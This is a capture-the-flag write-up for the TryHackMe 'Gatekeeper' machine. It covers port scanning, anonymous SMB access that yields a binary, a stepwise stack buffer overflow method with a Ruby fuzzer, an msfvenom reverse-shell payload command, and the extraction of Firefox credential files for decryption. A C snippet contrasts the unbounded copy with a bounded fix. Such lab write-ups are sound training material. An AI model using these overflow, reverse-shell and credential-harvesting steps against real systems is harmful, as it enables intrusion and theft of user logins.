TryHackMe-Gatekeeper

Target machine link: Gatekeeper

0x01 Information Gathering

Host is up (0.00050s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-07-03T17:01:47+00:00; -1s from scanner time.
31337/tcp open Elite?
| fingerprint-strings:
| FourOhFourRequest:
| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
| Hello
| GenericLines:
| Hello
| Hello
| GetRequest:
| Hello GET / HTTP/1.0
| Hello
| HTTPOptions:
| Hello OPTIONS / HTTP/1.0
| Hello
| Help:
| Hello HELP
| Kerberos:
| Hello !!!
| LDAPSearchReq:
| Hello 0
| Hello
| LPDString:
| Hello
| default!!!
| RTSPRequest:
| Hello OPTIONS / RTSP/1.0
| Hello
| SIPOptions:
| Hello OPTIONS sip:nm SIP/2.0
| Hello Via: SIP/2.0/TCP nm;branch=foo
| Hello From: <sip:[email protected]>;tag=root
| Hello To: <sip:[email protected]>
| Hello Call-ID: 50000
| Hello CSeq: 42 OPTIONS
| Hello Max-Forwards: 70
| Hello Content-Length: 0
| Hello Contact: <sip:[email protected]>
| Hello Accept: application/sdp
| Hello
| SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Hello
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:38:CE:D7:E6:B6 (Unknown)
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: -1s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:38:ce:d7:e6:b6 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: gatekeeper
| NetBIOS computer name: GATEKEEPER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-07-03T13:01:37-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-03T17:01:37
|_ start_date: 2020-07-03T16:47:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Let's see whether SMB has anything for us.

smbclient -L 10.10.26.76
Enter WORKGROUP\kali's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Users Disk
SMB1 disabled -- no workgroup available

Try an anonymous connection:

smbclient //10.10.26.76/C$      # requires a password
smbclient //10.10.26.76/Users   # allows anonymous users
smb: \> ls
. DR 0 Fri May 15 09:57:08 2020
.. DR 0 Fri May 15 09:57:08 2020
Default DHR 0 Tue Jul 14 15:07:31 2009
desktop.ini AHS 174 Tue Jul 14 12:54:24 2009
Share D 0 Fri May 15 09:58:07 2020
cd
7863807 blocks of size 4096. 3870864 blocks available
smb: \> cd Share
smb: \Share\> ls
. D 0 Fri May 15 09:58:07 2020
.. D 0 Fri May 15 09:58:07 2020
gatekeeper.exe A 13312 Mon Apr 20 13:27:17 2020

7863807 blocks of size 4096. 3870864 blocks available
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \Share\> exit

0x02 Vulnerability Verification

After downloading gatekeeper.exe, I ran it on 64-bit Windows 10 and debugged it with Immunity Debugger.

A simple buffer overflow breaks down into the following steps:

  1. Fuzz for the overflow: find out how many input characters it takes to crash the program.
  2. Use Pattern.rb to generate a unique pattern of the length found in step 1, send it, and compute the offset.
  3. Send offset + 4 and check whether the EIP value can be controlled manually; if it can, those 4 bytes are what lands in EIP.
  4. Measure how much space is available at ESP.
  5. Identify the bad characters.
  6. The opcode for JMP ESP is \xff\xe4; use mona to check whether the program has any protection mechanisms, then find the memory address of a JMP ESP.
  7. Generate the shellcode.
  8. Fill the buffer with: padding up to the overflow point + the JMP ESP address + NOP sled + shellcode.
  9. Start a listener and run the script.
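The bug class behind steps 1 to 9 is a fixed-size stack buffer filled from the socket with no length check. The constructed C below is an added illustration, not the source of gatekeeper.exe (only the compiled binary is on the box): it shows that shape next to a bounded handler for the same "Hello <line>!!!" protocol the nmap probes revealed. LINE_MAX_LEN is an assumed limit.

```c
#include <stdio.h>
#include <string.h>

/* Constructed limit for illustration; the real binary's buffer size is not known here. */
#define LINE_MAX_LEN 64

/* Vulnerable shape, shown for contrast only: the client line is copied into a fixed
   stack buffer without a bound, so a line of LINE_MAX_LEN bytes or more overwrites
   what sits above buf (saved EBP, then the return address that lands in EIP). */
void handle_unbounded(const char *line, char *reply, size_t reply_sz) {
    char buf[LINE_MAX_LEN];
    strcpy(buf, line);                         /* no length check: the classic bug */
    snprintf(reply, reply_sz, "Hello %s!!!\n", buf);
}

/* Hardened handler for the same protocol. data/len are the raw bytes received so far
   (as from recv(), not NUL-terminated). Returns the bytes consumed (> 0) and fills
   reply on success; 0 if no newline has arrived yet but the limit is not reached
   (keep buffering); -1 if LINE_MAX_LEN bytes arrived with no newline (log and drop). */
long handle_bounded(const unsigned char *data, size_t len, char *reply, size_t reply_sz) {
    size_t limit = len < LINE_MAX_LEN ? len : LINE_MAX_LEN;
    size_t i = 0;
    while (i < limit && data[i] != '\n') i++;
    if (i == limit)
        return len >= LINE_MAX_LEN ? -1 : 0;

    size_t n = i;                              /* payload length, newline excluded */
    if (n > 0 && data[n - 1] == '\r') n--;     /* strip CR (the real service echoed it) */

    char buf[LINE_MAX_LEN];                    /* n < LINE_MAX_LEN, so buf[n] is in bounds */
    memcpy(buf, data, n);
    buf[n] = '\0';
    snprintf(reply, reply_sz, "Hello %s!!!\n", buf);
    return (long)(i + 1);
}

/* Convenience wrapper: treat a C string as the bytes received from the client. */
long greet_line(const char *msg, char *reply, size_t reply_sz) {
    return handle_bounded((const unsigned char *)msg, strlen(msg), reply, reply_sz);
}

int main(void) {
    char reply[128], big[101];
    memset(big, 'A', 100); big[100] = '\n';    /* constructed oversized line */
    printf("rc=%ld %s", greet_line("GET / HTTP/1.0\r\n", reply, sizeof reply), reply);
    printf("rc=%ld (oversized line rejected)\n",
           handle_bounded((const unsigned char *)big, sizeof big, reply, sizeof reply));
    return 0;
}
```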

Since my Vulnhub-brainpan-1 writeup already covers this clearly and that program is almost identical to this one, I won't pad things out here.

One thing to note, though:

  • The Python socket never received the program's reply, so in the end I wrote it in Ruby. (Still a noob.)

Here is the code for the first step; from there on you only need to keep adjusting the value of buffer.

require 'socket'      # Sockets are part of the standard library

hostname = '192.168.56.3'
port = 31337

buffer = "A" * 200                          # fuzzing payload; grow this until the service crashes
socket = TCPSocket.open(hostname, port)     # connect to the server
socket.puts(buffer)

socket.close                                # close the socket

Local get_shell (screenshot)

Aside

If you write it in Python, the program first has some kind of protection mechanism; only after a certain amount of input has been sent does this mechanism stop working, and only then is the overflow stage reachable. But because the socket's recv method kept blocking and never received the returned value, or whatever it was, I couldn't get this buffer overflow working in Python. If you know how to do it, please tell me; I'm happy to learn.

0x03 Exploitation

msfvenom -p windows/shell_reverse_tcp LHOST=Your IP LPORT=1234 -b "\x00\x0a" -f ruby

[screenshots]

Ah, Firefox is installed, so harvesting the Firefox credentials is an option. msf makes this more convenient, so I spawned a new msf reverse shell.

[screenshots]

I tried all of the above; every one of them needs 64-bit, but the target machine is 32-bit. Then it occurred to me...

[screenshot]

After exporting, rename these four files back to their original names:

  • cert9.db
  • cookies.sqlite
  • key4.db
  • logins.json

Then also download the C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles folder.

[screenshot]

These are the files we end up with (ignore the other files under /tmp/). Then run the Firefox decryption script.

[screenshots]

Actually, you don't need msf: you can also just copy the files into the Samba share directory yourself. All four files live under Profiles.

[screenshot]